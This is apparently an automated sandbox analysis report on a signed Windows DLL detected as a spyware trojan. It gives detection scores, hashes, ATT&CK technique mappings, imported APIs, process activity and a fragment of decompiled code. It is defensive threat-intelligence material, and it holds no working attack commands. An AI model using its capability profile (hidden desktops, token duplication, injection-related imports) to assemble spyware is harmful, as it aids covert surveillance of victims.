Code function: 3_2_6ECA6D50 RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageA,KillTimer,RtlZeroMemory,wsprintfW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringA,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntA,wsprintfA,WritePrivateProfileStringA,SetEvent,SetTimer,DispatchMessageA,GetMessageA,KillTimer,VirtualFree,

3_2_6ECA6D50

Source: C:\Windows\SysWOW64\rundll32.exe

3_2_6ECA8510

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts2	Service Execution12	Create Account1	Valid Accounts2	Valid Accounts2	OS Credential Dumping	System Time Discovery1	Remote Services	Screen Capture1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Valid Accounts2	Access Token Manipulation21	Virtualization/Sandbox Evasion1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Windows Service12	Windows Service12	Access Token Manipulation21	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection11	Process Injection11	NTDS	Account Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	System Owner/User Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Rundll321	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
TV.dll	32%	Virustotal		Browse
TV.dll	27%	ReversingLabs	Win32.Trojan.SpywareX

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	TV.dll	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0	TV.dll	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	TV.dll	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	TV.dll	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	TV.dll	false	URL Reputation: safe	unknown
http://ocsp.sectigo.com0	TV.dll	false	URL Reputation: safe	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483792
Start date:	15.09.2021
Start time:	13:47:31
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	TV.bin (renamed file extension from bin to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal48.winDLL@9/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 95.9%) Quality average: 84% Quality standard deviation: 24.5%
HCA Information:	Successful, ratio: 92% Number of executed functions: 3 Number of non-executed functions: 83
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
13:48:32	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.743019659267088
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	TV.dll
File size:	75256
MD5:	a44f2649c82b35d42e6036d1c75e48c4
SHA1:	ee3b00701c97ed107b78ecbdf9d962f1508edc8e
SHA256:	760945429f7ea52c40c75a0fa0424d943e317ec48575c812545cc2c4be5b0510
SHA512:	b8340f06e3446aa91f435f4009557830bbc8e8279321f41198c076e8202869b98c156809cf3fad8f900b569aca2ab6b6a7725a1532e2846b31edec513e84734d
SSDEEP:	1536:coaayOa9Z58qTGIT0XhZKfl2MjEzHPggfLD//qQmoz:p1uZ58qTGITey4zJfLD3qQmC
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.l5...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...fRich...f................PE..L..

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1000bfa1
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x613B0BCE [Fri Sep 10 07:39:58 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	a1b64bf7b603bcc5fb4a94a56c86f83e

Authenticode Signature

Signature Valid:	true
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The operation completed successfully
Error Number:	0
Not Before, Not After	6/3/2021 5:00:00 PM 6/4/2022 4:59:59 PM
Subject Chain	CN=Hartex LLC, O=Hartex LLC, L=Moscow, C=RU
Version:	3
Thumbprint MD5:	5D5CA7E8D78224799E8AA101FF486137
Thumbprint SHA-1:	319517761E92EC6EEF1966A5994570D46A498093
Thumbprint SHA-256:	AC50A5D91A71BA8447EE795FF966E625AEC004E49EB24ADAA366B988686B65A5
Serial:	009B576882CCDB891FD6E4A66671F3AC71

Entrypoint Preview

Instruction
mov edi, edi
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F4020DB6D87h
call 00007F4020DB6F0Eh
pop ebp
jmp 00007F4020DB6B13h
int3
jmp dword ptr [1000D24Ch]
int3
int3
mov edi, edi
push ebp
mov ebp, esp
mov ecx, dword ptr [ebp+08h]
mov eax, 00005A4Dh
cmp word ptr [ecx], ax
je 00007F4020DB6D86h
xor eax, eax
pop ebp
ret
mov eax, dword ptr [ecx+3Ch]
add eax, ecx
cmp dword ptr [eax], 00004550h
jne 00007F4020DB6D71h
xor edx, edx
mov ecx, 0000010Bh
cmp word ptr [eax+18h], cx
sete dl
mov eax, edx
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [eax+3Ch]
add ecx, eax
movzx eax, word ptr [ecx+14h]
push ebx
push esi
movzx esi, word ptr [ecx+06h]
xor edx, edx
push edi
lea eax, dword ptr [eax+ecx+18h]
test esi, esi
jbe 00007F4020DB6D9Dh
mov edi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [eax+0Ch]
cmp edi, ecx
jc 00007F4020DB6D8Bh
mov ebx, dword ptr [eax+08h]
add ebx, ecx
cmp edi, ebx
jc 00007F4020DB6D8Ch
inc edx
add eax, 28h
cmp edx, esi
jc 00007F4020DB6D6Ah
xor eax, eax
pop edi
pop esi
pop ebx
pop ebp
ret
push 00000008h
push 1000E1A8h
call 00007F4020DB6DF1h
and dword ptr [ebp-04h], 00000000h
mov esi, 10000000h
push esi
call 00007F4020DB6CE6h
pop ecx
test eax, eax
je 00007F4020DB6DBFh
mov eax, dword ptr [ebp+08h]
sub eax, esi

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2010 SP1 build 40219
[ C ] VS2010 SP1 build 40219
[C++] VS2008 SP1 build 30729
[C++] VS2010 SP1 build 40219
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xfb20	0x56	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe1c4	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x54c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x10000	0x25f8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12000	0xe24	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xd490	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xd000	0x474	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb3a8	0xb400	False	0.566710069444	data	6.2885659067	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xd000	0x2b76	0x2c00	False	0.492542613636	data	5.83402513298	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x10000	0x978	0x400	False	0.439453125	data	3.70380830115	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x54c	0x600	False	0.314453125	data	5.27415157917	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12000	0x1094	0x1200	False	0.675347222222	data	5.98331885024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_MANIFEST	0x11088	0x15a	ASCII text, with CRLF line terminators	English	United States
RT_MANIFEST	0x111e4	0x365	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
MSVCRT.dll	_except_handler4_common, _amsg_exit, _initterm, free, malloc, _XcptFilter
NTDLL.dll	NtSetContextThread, NtFreeVirtualMemory, RtlComputeCrc32, RtlDecompressBuffer, NtTerminateThread, RtlRandom, NtAllocateVirtualMemory, RtlMoveMemory, NtSuspendThread, NtOpenThread, RtlGetVersion, NtQuerySystemInformation, NtQueryVirtualMemory, RtlCompareMemory, NtWriteVirtualMemory, NtFlushInstructionCache, RtlGetNtVersionNumbers, NtOpenProcess, RtlTimeToSecondsSince1970, NtGetContextThread, RtlZeroMemory, NtResumeThread, NtTerminateProcess, NtCreateSection, NtMapViewOfSection, NtUnmapViewOfSection, NtClose, NtProtectVirtualMemory
KERNEL32.dll	LocalFree, GetModuleHandleA, lstrlenA, VirtualFree, VirtualAlloc, GetFileSize, ExitProcess, GetFileAttributesA, Sleep, CreateThread, CreateEventA, OpenEventA, lstrcmpiA, GetCommandLineA, lstrcmpA, FindClose, FindNextFileA, DeleteFileA, lstrcatA, FindFirstFileA, lstrlenW, MoveFileExA, HeapReAlloc, WideCharToMultiByte, MultiByteToWideChar, CreatePipe, GetLastError, SetCurrentDirectoryA, GetExitCodeProcess, WaitForSingleObject, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpiW, FreeResource, LockResource, SizeofResource, LoadResource, FindResourceW, SetEvent, WaitForMultipleObjects, ExpandEnvironmentStringsA, FreeLibrary, GetSystemTimeAsFileTime, GetPrivateProfileStringW, GetLocaleInfoW, SetLastError, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameA, GetComputerNameExW, WTSGetActiveConsoleSessionId, GetSystemDirectoryA, DisableThreadLibraryCalls, WritePrivateProfileStringW, FormatMessageW, LoadLibraryExA, GetVolumeInformationW, LocalAlloc, InterlockedCompareExchange, InterlockedExchange, HeapCreate, HeapDestroy, QueryPerformanceCounter, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, LoadLibraryA, GetProcAddress, GetTickCount, lstrcpyA, CreateFileW, GetFileAttributesW, MoveFileExW, SetFilePointer, CloseHandle, WriteFile, ReadFile, HeapFree, GetProcessHeap, HeapAlloc, CreateFileA, CreateProcessA, GetPrivateProfileStringA
USER32.dll	MessageBoxW, GetWindowLongA, SetWindowLongA, SetWindowPos, BringWindowToTop, SetForegroundWindow, SendMessageA, GetThreadDesktop, CreateDesktopA, CloseDesktop, SwitchDesktop, SetThreadDesktop, LoadStringW, GetClassNameW, DestroyWindow, CreateDialogIndirectParamW, SetWindowTextA, GetWindowLongW, SetWindowLongW, PostQuitMessage, CallWindowProcW, CharLowerW, SetTimer, GetMessageA, KillTimer, GetForegroundWindow, GetWindowTextW, GetWindowThreadProcessId, GetDlgItemTextA, DispatchMessageA, GetDesktopWindow, GetDC, GetWindowRect, GetCursorInfo, GetIconInfo, DrawIconEx, ReleaseDC, CharLowerA, GetDlgItem, PostThreadMessageA, IsWindow, PostMessageA, wsprintfA, wsprintfW, ExitWindowsEx
SHLWAPI.dll	StrChrW, PathGetDriveNumberA, PathBuildRootW, StrToIntA, PathFindFileNameW, StrCmpNIW, StrCmpNIA, StrTrimA, PathIsRelativeA, PathIsRelativeW, PathQuoteSpacesW, StrRChrA, StrDupA, StrChrA, PathRemoveFileSpecA, PathAddBackslashA, PathFindFileNameA, PathRemoveFileSpecW, PathAddBackslashW
WTSAPI32.dll	WTSEnumerateSessionsA, WTSQuerySessionInformationA, WTSFreeMemory, WTSQueryUserToken
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock
ADVAPI32.dll	RegDeleteKeyA, RegDeleteValueA, RegEnumKeyExA, RegQueryInfoKeyA, RegOpenKeyExA, LogonUserW, AdjustTokenPrivileges, LookupPrivilegeValueW, GetUserNameW, RegisterServiceCtrlHandlerExW, QueryServiceStatusEx, RegQueryValueExA, RegCloseKey, SetNamedSecurityInfoA, SetSecurityInfo, SetEntriesInAclA, CreateWellKnownSid, GetNamedSecurityInfoA, GetSecurityInfo, FreeSid, CheckTokenMembership, AllocateAndInitializeSid, DuplicateToken, GetTokenInformation, OpenProcessToken, ConvertSidToStringSidA, EqualSid, DuplicateTokenEx, CreateProcessAsUserW, CloseServiceHandle, DeleteService, ControlService, QueryServiceStatus, OpenServiceA, OpenSCManagerA, StartServiceA, ChangeServiceConfigA, QueryServiceConfigA, SetServiceStatus, RegCreateKeyExA, ChangeServiceConfig2A, CreateServiceA, RegSetValueExA
WININET.dll	InternetSetOptionA, InternetConnectA, HttpOpenRequestA, HttpAddRequestHeadersA, HttpSendRequestExA, InternetOpenA, InternetCloseHandle, HttpQueryInfoA, InternetReadFile, InternetWriteFile, InternetOpenUrlA, HttpEndRequestA
SHELL32.dll	SHCreateDirectoryExW, SHGetSpecialFolderPathA, ShellExecuteExA, SHFileOperationA, SHCreateDirectoryExA
PSAPI.DLL	GetModuleFileNameExW
GDI32.dll	CreateCompatibleDC, BitBlt, DeleteDC, DeleteObject, CreateCompatibleBitmap, SelectObject, GetObjectA
Cabinet.dll
OLEAUT32.dll	VariantInit, SysAllocString, SysAllocStringLen, SysFreeString
ole32.dll	CoSetProxyBlanket, CoCreateInstance, CoInitializeEx, CoUninitialize, CoTaskMemFree

Exports

Name	Ordinal	Address
SvcEntry	400	0x10003b60

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 6240 Parent PID: 2832

General

Start time:	13:48:28
Start date:	15/09/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe 'C:\Users\user\Desktop\TV.dll'
Imagebase:	0x1020000
File size:	116736 bytes
MD5 hash:	542795ADF7CC08EFCF675D65310596E8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 6276 Parent PID: 6240

General

Start time:	13:48:28
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6308 Parent PID: 6240

General

Start time:	13:48:29
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\TV.dll,SvcEntry
Imagebase:	0xf30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6324 Parent PID: 6276

General

Start time:	13:48:29
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\TV.dll',#1
Imagebase:	0xf30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6476 Parent PID: 6240

General

Start time:	13:48:32
Start date:	15/09/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\TV.dll',SvcEntry
Imagebase:	0xf30000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 6308 Parent PID: 6240 rundll32.exeCOMMON

Executed Functions

Function 6ECA8510, Relevance: 225.2, APIs: 113, Strings: 15, Instructions: 1164
memorythreadCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E6ECA8510(struct HINSTANCE__* _a4, intOrPtr _a8) {
				char _v268;
				char _v276;
				char _v284;
				char _v292;
				char _v524;
				char _v532;
				char _v540;
				char _v548;
				char _v556;
				char _v568;
				char _v572;
				char _v576;
				char _v580;
				char _v584;
				char _v588;
				char _v592;
				char _v596;
				char* _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				int _v612;
				char* _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				int _v628;
				char* _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				int _v644;
				char* _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				int _v660;
				char* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				int _v676;
				char* _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				int _v692;
				char* _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				int _v708;
				char* _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				int _v724;
				char* _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				int _v740;
				char* _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				int _v756;
				char* _v760;
				char _v764;
				intOrPtr _v768;
				int _v772;
				char* _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				int _v788;
				char* _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				int _v804;
				char* _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				int _v820;
				char* _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				void* _v836;
				char* _v840;
				long _v844;
				intOrPtr _v848;
				int _v852;
				long _v856;
				intOrPtr _v860;
				void _v864;
				char _v868;
				long _v876;
				intOrPtr _v892;
				int _v912;
				char* _v916;
				int _v920;
				char* _v924;
				int _v928;
				void* _v932;
				int _v936;
				char _v937;
				char _v938;
				short _v939;
				void* _v940;
				int _v944;
				char _v945;
				short _v947;
				void* _v948;
				void* _v952;
				void* _v956;
				char* _v960;
				char _v964;
				char _v968;
				short _v970;
				char _v972;
				short _v974;
				char _v976;
				short _v978;
				char _v980;
				short _v982;
				char _v984;
				char _v988;
				char _v992;
				signed int _v996;
				signed int _v1008;
				intOrPtr _t262;
				void* _t263;
				void* _t264;
				void* _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t269;
				void* _t270;
				void* _t271;
				void* _t272;
				void* _t273;
				void* _t274;
				void* _t275;
				struct HINSTANCE__* _t277;
				struct HINSTANCE__* _t278;
				struct HINSTANCE__* _t279;
				struct HINSTANCE__* _t280;
				struct HINSTANCE__* _t281;
				struct HINSTANCE__* _t282;
				struct HINSTANCE__* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				void* _t287;
				void* _t288;
				void* _t289;
				void* _t290;
				CHAR* _t343;
				CHAR* _t347;
				void* _t350;
				void* _t351;
				void* _t357;
				CHAR* _t359;
				long _t360;
				char* _t362;
				void* _t363;
				intOrPtr _t365;
				char _t366;
				WCHAR* _t369;
				void* _t371;
				CHAR* _t373;
				intOrPtr _t375;
				CHAR* _t390;
				CHAR* _t400;
				void* _t403;
				signed int _t404;
				int _t407;
				struct HINSTANCE__* _t410;
				intOrPtr _t413;
				void* _t415;
				struct HINSTANCE__* _t419;
				void* _t423;
				struct HINSTANCE__* _t425;
				void* _t426;
				struct HINSTANCE__* _t428;
				void* _t429;
				char _t430;
				int _t431;
				void* _t432;
				char _t433;
				int _t434;
				void* _t436;
				int _t440;
				void* _t441;
				int _t443;
				intOrPtr _t444;
				intOrPtr _t456;
				char* _t457;
				char* _t459;
				char _t461;
				intOrPtr* _t467;
				char* _t468;
				int _t469;
				void* _t471;
				void* _t472;
				int _t474;
				short* _t475;
				long _t480;
				long _t484;
				char* _t493;
				int _t494;
				WCHAR* _t498;
				void* _t500;
				CHAR* _t502;
				char _t503;
				char _t505;
				char _t506;
				void* _t532;
				char* _t537;
				void* _t540;
				CHAR* _t543;
				CHAR* _t544;
				char _t551;
				CHAR* _t552;
				intOrPtr _t559;
				intOrPtr _t566;
				void* _t567;
				void* _t580;
				signed int _t582;
				void* _t583;
				signed int _t587;
				void** _t589;
				intOrPtr* _t592;
				void* _t596;
				struct HINSTANCE__* _t597;
				void* _t602;
				void* _t604;
				void* _t609;
				void* _t612;
				void* _t613;
				void* _t614;
				void* _t615;
				void* _t616;
				void* _t617;
				void* _t618;
				void* _t619;
				void* _t623;
				void* _t624;

				_t262 = _a8;
				if(_t262 == 0) {
					_t263 = "on=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xcd1a50
					__eflags = _t263;
					if(_t263 != 0) {
						HeapFree(GetProcessHeap(), 0, _t263);
					}
					_t264 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD";
					__eflags = _t264;
					if(_t264 != 0) {
						HeapFree(GetProcessHeap(), 0, _t264);
					}
					_t265 = M6ECB0520; // 0xcbff88
					__eflags = _t265;
					if(_t265 != 0) {
						HeapFree(GetProcessHeap(), 0, _t265);
					}
					_t266 = M6ECB0524; // 0xcd1c70
					__eflags = _t266;
					if(_t266 != 0) {
						HeapFree(GetProcessHeap(), 0, _t266);
					}
					_t267 = M6ECB0528; // 0xcc27f0
					__eflags = _t267;
					if(_t267 != 0) {
						HeapFree(GetProcessHeap(), 0, _t267);
					}
